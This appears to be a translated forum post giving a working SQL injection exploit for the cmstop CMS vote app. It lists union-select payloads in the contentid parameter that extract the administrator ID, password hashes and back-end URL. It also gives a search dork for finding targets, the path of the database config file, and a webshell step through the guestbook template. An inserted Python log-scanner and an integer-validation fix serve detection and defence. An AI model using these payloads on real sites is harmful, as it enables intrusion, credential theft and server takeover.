I have been playing with this vulnerability for a few months.
I saw that the expert ztz over at Nine Zones has released an exploit.
Vulnerable file: /apps/vote/controller/vote.php
app.xxx.com/?app=vote&controller=vote&action=total&contentid=1
Obtaining an administrator ID:
? app=vote&controller=vote&action=total&contentid=1 and 1=2 union select userid from cmstop_admin where departmentid=2 limit 0,1;#
Having got the administrator ID, what you write next is up to you:
? app=vote&controller=vote&action=total&contentid=1 and 1=2 union select concat(username,char(0x3d),password) from cmstop_member where userid=1;#
Reading the admin back-end address:
? app=vote&controller=vote&action=total&contentid=1%20and%2 0 1=2%20union%20select%20url%20from%20cmstop_mymenu%20where%2 0 1=1%20limit%200,1;%2 3
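For defenders, the requests above all share one trait: contentid carries something other than a plain integer. The following detection sketch is an added example, not code from the original post or from cmstop. It assumes combined-format access logs and that a legitimate contentid is always a decimal integer; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# Keywords that make a non-numeric value more likely to be an injection probe.
SQL_HINT_RE = re.compile(r"\b(?:union|select|concat|from|where|limit)\b", re.I)

def classify(line):
    """Return None for unrelated lines, else 'ok', 'non-numeric' or 'sqli'."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs percent-decodes values, so %20/%23-encoded probes are normalised.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if params.get("app") != ["vote"] or params.get("action") != ["total"]:
        return None
    values = params.get("contentid", [])
    # Assumption: a legitimate contentid is a plain decimal integer.
    bad = [v for v in values if not re.fullmatch(r"[0-9]+", v)]
    if not bad:
        return "ok"
    return "sqli" if any(SQL_HINT_RE.search(v) for v in bad) else "non-numeric"

# Constructed sample log lines (documentation IP ranges, shortened values).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?app=vote&controller=vote&action=total&contentid=1 HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?app=vote&controller=vote&action=total&contentid=1%20and%201=2%20union%20select%20x%20from%20t;%23 HTTP/1.1" 200 298',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /?app=vote&controller=vote&action=total&contentid=1%27 HTTP/1.1" 500 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /?app=guestbook HTTP/1.1" 200 1024',
]

def scan(lines):
    """Return (client_ip, verdict) for every vote/total request that is not 'ok'."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict not in (None, "ok"):
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same integer-only rule is the server-side fix: cast or validate contentid as an integer before it reaches the query in vote.php.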
In cmstop, only this app is a dynamic script.
On how to find this dynamic site:
site:xxx.com inurl:roll.php
Database file:
cmstop/config/db.php
On getting a shell:
After logging into the back end with the administrator account, insert a one-liner directly into the guestbook template under the templates.
Then visit app.xxx.com/?app=guestbook
Experts, go ahead and study it.